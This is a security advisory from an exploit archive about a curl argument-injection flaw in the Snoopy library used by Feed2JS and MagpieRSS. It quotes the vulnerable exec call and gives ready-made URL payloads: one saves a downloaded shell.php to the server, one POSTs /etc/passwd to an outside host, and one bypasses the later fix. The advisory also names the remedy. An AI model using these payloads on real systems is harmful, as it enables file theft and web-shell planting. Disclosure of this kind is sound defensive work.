exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Feed2JS File Disclosure

Feed2JS File Disclosure
Posted Jul 5, 2014
Authored by Michail Strokin

Feed2JS uses MagpieRSS for parsing the feeds, and MagpieRSS uses Snoopy library for fetching the documents. The version of Snoopy in use suffers from a local file disclosure vulnerability.

tags | exploit, local, info disclosure
advisories | CVE-2005-3330, CVE-2008-4796
SHA-256 | 54b4ad9f743366aa2b501e4ca2194accabe9a331e09eb5b4f6fdc136c9826b93

Feed2JS File Disclosure

Change Mirror Download
Feed2JS is a tool for user-friendly(developer-wise) embedding the RSS
feeds on the pages without messing with XML.

I’ve found out today that it’s vulnerable to local file disclosure
(all your /etc/passwds could be stolen).
It could be used for remote file inclusion as well.

tl;dr – fixed files at the bottom of the post

Feed2JS uses MagpieRSS for parsing the feeds, and MagpieRSS uses
Snoopy library for fetching the documents:

Snoopy - the PHP net client
Author: Monte Ohrt <monte@ispi.net>
Copyright (c): 1999-2000 ispi, all rights reserved
Version: 1.0


Snoopy 1.0 is 12 years old (sic!),6 years ago someone ‘found’ a
vulnerability in Snoopy 1.2.3:

CVE-2008-4796:
The _httpsrequest function (Snoopy/Snoopy.class.php) in Snoopy 1.2.3
and earlier, as used in (1) ampache, (2) libphp-snoopy, (3) mahara,
(4) mediamate, (5) opendb, (6) pixelpost, and possibly other products,
allows remote attackers to execute arbitrary commands via shell
metacharacters in https URLs.

But this was actually discovered 3 years prior to that(9 years ago!):

CVE-2005-3330
The _httpsrequest function in Snoopy 1.2, as used in products such as
(1) MagpieRSS, (2) WordPress, (3) Ampache, and (4) Jinzora, allows
remote attackers to execute arbitrary commands via shell
metacharacters in an HTTPS URL to an SSL protected web page, which is
not properly handled by the fetch function.

As you can see, Snoopy 1.0 is definetely older than v1.2.3, so the
_httpsrequest function should be vulnerable in the Snoopy library used
in Feed2JS, even though I read somewhere that this issue is fixed in
Magpie 0.7.2(it’s not)..

Some code snippets from Feed2JS/Magpie:


extlib/Snoopy.class.inc

/*======================================================================*\
Function: fetch
Purpose: fetch the contents of a web page
(and possibly other protocols in the
future like ftp, nntp, gopher, etc.)
Input: $URI the location of the page to fetch
Output: $this->results the output text from the fetch
\*======================================================================*/

function fetch($URI)
{
$URI_PARTS = parse_url($URI);
switch($URI_PARTS["scheme"])
{
case "https":
$path = $URI_PARTS["path"].($URI_PARTS["query"] ? "?".$URI_PARTS["query"] : "");
$this->_httpsrequest($path, $URI, $this->_httpmethod);
break;
}
}

/*======================================================================*\
Function: _httpsrequest
Purpose: go get the https data from the server using curl
Input: $url the url to fetch
$URI the full URI
$body body contents to send if any (POST)
Output:
\*======================================================================*/

function _httpsrequest($url,$URI,$http_method,$content_type="",$body="")
{
...
exec($this->curl_path." -D
\"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)."
".escapeshellcmd($URI),$results,$return);
...
}

I cringe every time when I see “exec” functions, so lets check whats
wrong in using it ..

From php.net:

Warning
escapeshellcmd() should be used on the whole command string, and it
still allows the attacker to pass arbitrary number of arguments. For
escaping a single argumentescapeshellarg() should be used instead.

You can pass additional curl arguments (you can check curl manual @
http://curl.haxx.se/docs/manpage.html), for example:

?src=https://example.com/%20-H"something:test"

This code will send something:test in the headers (can be used to get
sensitive information about the server).

You can also download a file and save it locally using curl -o flag.

?src=https://example.com/shell%20-o"cache/shell.php"

this will download https://example.com/shell and save it into cache/
directory (which has 777 permissions by design)

Or you can submit

?src=https://example.com/%20-F%20"file=@/etc/passwd"

to get the /etc/passwd POSTed to your malicious URL and save it using
$_FILES['file'].

Snoopy 1.2.4 is vulnerable as well, so this IS kind-of a
0day(2005-3330 / 2008-4796 wasn't fixed properly)..

Snoopy 1.2.4 ‘fixed’ the CVE-2008-4796 by using quotes around the
escapeshellcmd, but it is still vulnerable, you can exploit it like
this:

?src=https://example.com/"%20-F%20"file=@/etc/passwd

To fix this, you need to use escapeshellarg instead of escapeshellcmd
so that it's only possible to use 1 argument.

Snoopy 1.2.4 also lacks gzip support and messed up the compatibility
with MagpieRSS..

Fixed version of Snoopy.class.inc is here:

https://raw.githubusercontent.com/cogdog/feed2js/master/magpie/extlib/Snoopy.class.inc

P.S. original post at
http://mstrokin.com/sec/feed2js-magpierss-0day-vulnerability-not-really-it-is-actually-cve-2005-3330-cve-2008-4796/

P.P.S should I request a CVE?


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close